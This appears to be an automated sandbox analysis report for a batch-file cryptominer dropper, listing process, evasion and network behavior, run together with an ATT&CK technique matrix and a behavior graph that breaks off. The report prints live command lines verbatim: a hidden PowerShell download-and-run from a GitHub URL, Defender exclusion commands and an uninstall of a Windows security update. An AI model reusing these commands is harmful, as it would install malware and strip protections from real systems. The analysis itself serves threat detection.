            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4250Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5605Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3920Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 410Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6400Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3370Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7265
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2363
            Source: C:\ProgramData\Chrome.exeDropped PE file which has not been started: C:\Windows\Temp\lhaqmlexwhjs.sysJump to dropped file
            Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1556Thread sleep count: 4250 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1716Thread sleep count: 5605 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1944Thread sleep time: -13835058055282155s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 3920 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep count: 410 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 600Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 6400 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3152Thread sleep count: 3370 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1756Thread sleep time: -10145709240540247s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6844Thread sleep count: 7265 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5656Thread sleep count: 2363 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6068Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2296Thread sleep count: 89 > 30
            Source: C:\Windows\explorer.exe TID: 2296Thread sleep count: 38 > 30
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: powershell.exe, 00000003.00000002.1567798861.000002576F5F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\conhost.exeCode function: 47_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,47_2_0000000140001160

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 95.179.241.203 443
            Source: C:\Windows\explorer.exeNetwork Connect: 104.20.4.235 443
            Source: Yara matchFile source: eshkere.bat, type: SAMPLE
            Source: Yara matchFile source: amsi64_4872.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4872, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Users\user\AppData\Local\Temp\1348.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
            Source: C:\ProgramData\Chrome.exeMemory written: PID: 4680 base: 140000000 value: 4DJump to behavior
            Source: C:\ProgramData\Chrome.exeMemory written: PID: 4680 base: 140001000 value: NUJump to behavior
            Source: C:\ProgramData\Chrome.exeMemory written: PID: 4680 base: 140674000 value: DFJump to behavior
            Source: C:\ProgramData\Chrome.exeMemory written: PID: 4680 base: 140847000 value: 00Jump to behavior
            Source: C:\ProgramData\Chrome.exeMemory written: PID: 4680 base: 6BC010 value: 00Jump to behavior
            Source: C:\ProgramData\Chrome.exeThread register set: target process: 1404Jump to behavior
            Source: C:\ProgramData\Chrome.exeThread register set: target process: 4680Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
            Source: C:\ProgramData\Chrome.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\AppData\Local\Temp\1348.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            11
            Scripting
            1
            DLL Side-Loading
            1
            File and Directory Permissions Modification
            OS Credential Dumping1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            11
            Windows Service
            1
            Disable or Modify Tools
            LSASS Memory13
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Service Execution
            11
            Windows Service
            311
            Process Injection
            1
            Obfuscated Files or Information
            Security Account Manager311
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            File Deletion
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeylogging3
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion
            DCSync1
            Remote System Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
            Process Injection
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528950 Sample: eshkere.bat Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 84 pastebin.com 2->84 86 pool.hashvault.pro 2->86 88 2 other IPs or domains 2->88 104 Multi AV Scanner detection for submitted file 2->104 106 Yara detected Powershell download and execute 2->106 108 Yara detected Xmrig cryptocurrency miner 2->108 112 5 other signatures 2->112 10 cmd.exe 1 2->10         started        13 Chrome.exe 1 2->13         started        signatures3 110 Connects to a pastebin service (likely for C&C) 84->110 process4 file5 124 Suspicious powershell command line found 10->124 126 Tries to download and execute files (via powershell) 10->126 16 powershell.exe 12 10->16         started        18 powershell.exe 14 16 10->18         started        23 conhost.exe 10->23         started        82 C:\Windows\Temp\lhaqmlexwhjs.sys, PE32+ 13->82 dropped 128 Multi AV Scanner detection for dropped file 13->128 130 Injects code into the Windows Explorer (explorer.exe) 13->130 132 Modifies the context of a thread in another process (thread injection) 13->132 134 3 other signatures 13->134 25 explorer.exe 13->25         started        27 powershell.exe 13->27         started        29 cmd.exe 13->29         started        31 6 other processes 13->31 signatures6 process7 dnsIp8 33 1348.exe 1 1 16->33         started        90 github.com 140.82.121.4, 443, 49706 GITHUBUS United States 18->90 92 raw.githubusercontent.com 185.199.109.133, 443, 49707 FASTLYUS Netherlands 18->92 80 C:\Users\user\AppData\Local\Temp\1348.exe, PE32+ 18->80 dropped 116 Powershell drops PE file 18->116 94 pastebin.com 104.20.4.235, 443, 49714 CLOUDFLARENETUS United States 25->94 96 pool.hashvault.pro 95.179.241.203, 443, 49713 AS-CHOOPAUS Netherlands 25->96 118 System process connects to network (likely due to code injection or exploit) 25->118 120 Query firmware table information (likely to detect VMs) 25->120 122 